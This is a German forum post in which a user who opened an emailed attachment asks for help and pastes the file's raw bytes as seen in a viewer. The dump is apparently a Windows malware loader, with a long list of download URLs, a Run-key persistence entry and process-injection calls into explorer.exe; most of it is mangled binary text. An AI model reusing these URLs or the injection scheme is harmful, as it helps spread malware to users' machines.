title image


Smiley HILFE, habe nen VIRUS
Hallo,

habe versehentlich ne Datei, die per mail kam, an meinem pc geöffnet (t_535475.exe) ...die hat im Hintergrund irgendwas gemacht... seit dem bekomme ich ständig ein Fenster:



"Verbindung zu av2026.comex.ru herstellen"

"Privat"

Benutzername:" --> Imputfeld für Benutzername

"Kennwort:" --> Imputfeld für Kennwort



wenn ich die Datei (t_535475.exe) mit windowsCommander betrachte kommt folgendes:







MZ   ÿÿ @ @ ´LÍ! @ PE L !™gC à    2 r  @     p        l < `  l .text     à.rdata Ø   @ @.data $ 0 "

@ À.rsrc  `  , @ À U‹ìVWS‹}‹u Wè\ …Àt#“ü3ÀƒÉÿò®€? tWSè1 ‰…Àt­ë㸠[_^É U‹ìƒÄøj j jj jh @ÿuèÛ ‰Eü@uÉ j EøPÿuÿu ÿuüè ÿuüè© ¸ É U‹ìÄTÿÿÿSDžTÿÿÿ” …TÿÿÿPè¼ ƒ½Xÿÿÿ‚Ý häP@ hP@ è8ÿÿÿÿuj h: è ‰Eü…À„² ÿu èÀ ‰Eôjh  ÿuôj ÿuüÿäP@ ‰Eø3Û Àtj ÿuôÿu ÿuøÿuüÿðP@ ÀtThP@ è) hƒP@ Pè$ UðRj ÿuøPj j ÿuüÿìP@ ‰Eì Àt!jÿÿuìè2 EèPÿuìèÞ ‹]èÿuìèµ h € j ÿuøÿuüÿèP@ ÿuüèš ‹ßëhøP@ èÎ Àt h' èÞ ëô[É U‹ìƒÄüEüPhGP@ ÿuèê hýQ@ èÔ @PhýQ@ jj h P@ ÿuüèÎ ÿuüèº É U‹ìÄÔþÿÿDžØþÿÿ( j jè( ‰…Ôþÿÿ…ØþÿÿPÿµÔþÿÿèL Àt1…üþÿÿPh5P@ èa Àu‹…àþÿÿÉߍ…ØþÿÿPÿµÔþÿÿè ëËÿµÔþÿÿè¾ 3ÀÉßh hýQ@ èá hP@ hýQ@ è h hS@ j è¯ j hýQ@ hS@ è€ h €èùþÿÿh €èïþÿÿh høP@ è h$P@ høP@ èº h€ høP@ è“ h h 0@ høP@ è9ýÿÿ Àtèêþÿÿ£ôP@ høP@ ÿ5ôP@ ègýÿÿj è ÿ%d @ ÿ%\ @ ÿ%X @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ% @ ÿ%$ @ ÿ%( @ ÿ%, @ ÿ%0 @ ÿ%` @ ÿ%4 @ ÿ%8 @ ÿ%< @ ÿ%@ @ ÿ%D @ ÿ%H @ ÿ%L @ ÿ%P @ ÿ%T @ ÿ% @ ÿ% @ ÿ% @ ¨" ¸" š"


$ PE L ™gC à ! 

 †       `  ´g       ˜ Œ P l ˜ .text ^ 

 à.rdata 2   @ @.data ø 0   @ À.reloc  P   @ B U‹ìSƒ} ujj@è» ‹U ‰Æ [É j j j j jÿÿuj j èÈ PPj@è ‹U ‰Yj j QPjÿÿuj j è¥ [É j j èµ ÀtßhM è| ëæßVSjY3Ã’3Û¬¶ÀC
èÅ ‹U‹EüPÿuÿ’à ƒ}üuÞGEÃŒPèý ÿuôèï ÿuÄèç ‹Ç_^É 3À‹ÐÑâj YÑêsò ƒ¸íâô‰…ø? þÀuâßU‹ìV‹E÷Ћu ‹Mã‹ÐÁê2%ÿ ‹…ø? 3ÂFâè÷Ð^É U‹ìÄtÿÿÿDžtÿÿÿ j j jj jh €ÿuèÎ ‰Eü@tCj EøPh€ …xÿÿÿPÿuüèÞ ÿuø…xÿÿÿPÿµtÿÿÿèqÿÿÿ‰…tÿÿÿƒ}ø uÅÿuüès ‹…tÿÿÿÉ U‹ìƒÄôÿuèuÿÿÿ‰Eôj j jj jh ÀÿuèS ‰Eü@t*jj j ÿuüè{ j EøPjEôPÿuüè ÿuüè É U‹ìƒÄðS3Ûj j jj jh Àÿuèÿ ‰Eü@„‡ j ÿuüè÷ =  |njj jüÿuüè j EøPjEôPÿuüèò jj jüÿuüèð ÿuüèâ ÿuè¬þÿÿ‰Eøjj j ÿuüèÏ j EðPjEôPÿuüèÓ ‹Eø;Eô”ßÿuüè\ “[É U‹ìÄ°ýÿÿVWSèüÿÿ3ÿh …ØýÿÿPè\ …ØýÿÿPht0 …ÜþÿÿPèŒ ÂƒÄ Ã¨ÂŠ ‰…²ýÿÿDž¶ýÿÿ …Üþÿÿ‰…ºýÿÿDž¾ýÿÿ fDžÂýÿÿ…²ýÿÿPè[ …ØýÿÿPhƒ0 …ÜþÿÿPè1 ÂƒÄ j …ÜþÿÿPè´ …ÐýÿÿPh 0 jj h0 èH …Àˆó ÿuj ÿµÐýÿÿè-üÿÿ À„¶ ‹•Ðýÿÿ‹EüPÿµÐýÿÿÿRH…Àˆ™ ‹Uü‹EøPh 0 ÿuüÿ…Àˆs ‹Uø‹EôPÿuøÿR$…ÀˆQ ‹Uô‹EðPÿuôÿ’ð …Àˆ, EìPÿuðèaúÿÿÿuìèc ƒø†ÿ PEàPjÿuìèûÿÿY‹Uàƒé;Ñ…á ƒø…Ø ‹uìƒÆRj èé ‹øPÿuàVèáúÿÿ‹Ø3ö Û„ª èÀ P…ØýÿÿPhb0 …ÜþÿÿPèõ ƒÄWj j jj jh @…ÜþÿÿPèv ‰Eè@t8ë*j …ÔýÿÿPSWÿuèè¯ ƒ½Ôýÿÿ uë½Ôýÿÿ+Ôýÿÿ ÛuÒÿuèè& _ Ûu*…ÜþÿÿPèýÿÿ Àtj j j …ÜþÿÿPh0 j è‚ FWè' ‹þÿuìè ÿuðè‡ ‹Uô‹ÿuôÿR‹Uø‹ÿuøÿR‹Uü‹ÿuüÿR‹•Ðýÿÿ‹ÿµÐýÿÿÿ’€ ‹•Ðýÿÿ‹ÿµÐýÿÿÿR‹Ç[_^É W¿”0 Wè.ýÿÿ Àu ü3ÀjÿYò®8uê_ßU‹ìè3ûÿÿj è èÎÿÿÿh ºÛ ÿ5ô7 è¨ ëéÉ U‹ìƒÄüj j jj èA £ô7 EüPj j h, j j è2 ÉßU‹ìƒ} uèÂÿÿÿ¸ É Ìÿ% ÿ% ÿ% ÿ% ÿ% ÿ% ÿ% ÿ% ÿ% ÿ%$ ÿ%( ÿ%, ÿ%0 ÿ%4 ÿ%8 ÿ% ÀOÉânß À F%D,3Ë&дƒ ÀOÙContent-Type: application/x-www-form-urlencoded

%s\exefld\%lu.exe %s\exefld\*.* %s\exefld\ open http://www.aro-tec.com/w.php http://sarancha.ru/w.php http://home.1000km.ru/w.php http://www.stanislawkowalczyk.netstrefa.com/w.php http://1st-new-orleans-hotels.com/w.php http://www.OTT-INSIDE.de/w.php http://lifejacks.de/w.php http://25kadr.org/w.php http://africa-tours.de/w.php http://wunderlampe.com/w.php http://charlies-truckerpage.de/w.php http://template.nease.net/w.php http://s89.tku.edu.tw/w.php http://phrmg.org/w.php http://www.etwas-mode.de/w.php http://www.rewardst.com/w.php http://757555.ru/w.php http://www.8ingatlan.hu/w.php http://oklens.co.jp/w.php http://www.a2zhostings.com/w.php http://www.abavitis.hu/w.php http://abtechsafety.com/w.php http://acentrum.pl/w.php http://www.adamant-np.ru/w.php http://furdoszoba.info/w.php http://adavenue.net/w.php http://ccooaytomadrid.org/w.php http://abtechsafety.com/w.php http://av2026.comex.ru/w.php http://80.146.233.41/w.php http://www.barth.serwery.pl/w.php http://www.leap.co.il/w.php http://virt33.kei.pl/w.php http://www.bmswijndepot.com/w.php http://209.126.128.203/w.php http://www.timecontrol.com.pl/w.php http://adoptionscanada.ca/w.php http://65.108.195.73/w.php http://tkdami.net/w.php http://www.ubu.pl/w.php http://adventecgroup.com/w.php http://sacafterdark.net/w.php http://agenciaspublicidadinternet.com/w.php http://www.agroturystyka.artneo.pl/w.php http://kepter.kz/w.php http://ahava.cafe24.com/w.php http://mijusungdo.net/w.php http://aibsnlea.org/w.php http://aikidan.com/w.php http://202.44.52.38/w.php http://drinkwater.ru/w.php http://ala-bg.net/w.php http://allinfo.com.au/w.php http://eleceltek.com/w.php http://alevibirligi.ch/w.php http://alfaclassic.sk/w.php http://allanconi.it/w.php http://www.americarising.com/w.php http://americasenergyco.com/w.php http://amerykaameryka.com/w.php http://amistra.com/w.php http://analisisyconsultoria.com/w.php http://calamarco.com/w.php  l _1r1¯1¶1Ä12¨2t4Ï4ø45Q5 6›67G7j7w7 7¦7¬7²7¸7¾7Ä7Ê7Ð7Ö7Ü7â7è7î7ô7ú7 88 8888$8*80868<8B8H8N8T8Z8 auto__hloader__key \hloader_exe.exe \hleader_dll.dll explorer.exe open SOFTWARE\Microsoft\Windows\CurrentVersion\Run Shell_TrayWnd LoadLibraryA kernel32.dll VirtualAllocEx VirtualFreeEx CreateRemoteThread WriteProcessMemory   € 8 €   P €   h €  €    ` h g  ( 0 `    € € €€ € € € €€ ÀÀÀ €€€ ÿ ÿ ÿÿ ÿ ÿ ÿ ÿÿ ÿÿÿ ‡ˆ ÿÿwˆ€ ÿÿÿÿÿwˆˆ ÿÿÿÿÿÿÿÿ÷xˆ ÿwÿÿÿÿÿÿÿÿÿÿp ÿ€ ÿÿÿÿÿÿÿp ÿÿÿ÷ÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ÿ ˆÿÿÿÿÿÿÿð ÿwxˆÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ÷ˆ‡ÿÿÿÿÿÿÿÿð ÷ˆ€ ˆwÿÿÿÿð ÿÿÿÿ÷xˆ ÿÿð ÿÿÿÿÿÿÿÿwÿÿð ÿ ˆwÿÿÿÿÿð ÿÿ÷xˆ ‡ÿÿð ÿÿÿÿÿÿÿ÷x‡ÿÿð ÿ ˆ‡wÿÿÿÿÿÿÿð ÿwˆ€ ˆ‡wÿÿð ÿÿÿÿÿÿwˆˆˆÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ø ˆÿÿÿÿÿÿÿÿð ÿwxˆÿÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ÷ˆwÿÿÿÿÿÿÿÿð ÷ˆ ÿÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð ÿÿÿÿÿÿÿÿÿÿÿÿð xÿÿÿÿÿÿÿÿÿÿ𠆏øhÿxÿ‡ÿ÷ÿp wxg÷vxh÷†xgp ˆˆèˆŽ‡whwx‡÷ˆp ˆx臎ˆˆhˆˆhˆ†€ n`ff†hèˆvˆˆf f fæ`næFæä ` f` ÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿàÿÿÿÿ ÿÀÿÿÿ ÿÀ ÿÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿ€ ÿ ÿá ÿ ÿóˆ@ÿ ÿÿÿ÷ÿ ÿÿÿÿÿÿ   00   h 







kann mir jemand weiter helfen? Antivir findet nix! was für eine Verbindung will der pc hier aufbauen? welches Programm steckt dahinter? Was hat die Datei bei mir angerichtet? Wie bekomme ich mein pc wieder in Ordnung?



HILFE

Andy

geschrieben von

Login

E-Mail:
  

Passwort:
  

Beitrag anfügen

Symbol:
 
 
 
 
 
 
 
 
 
 
 
 
 

Überschrift: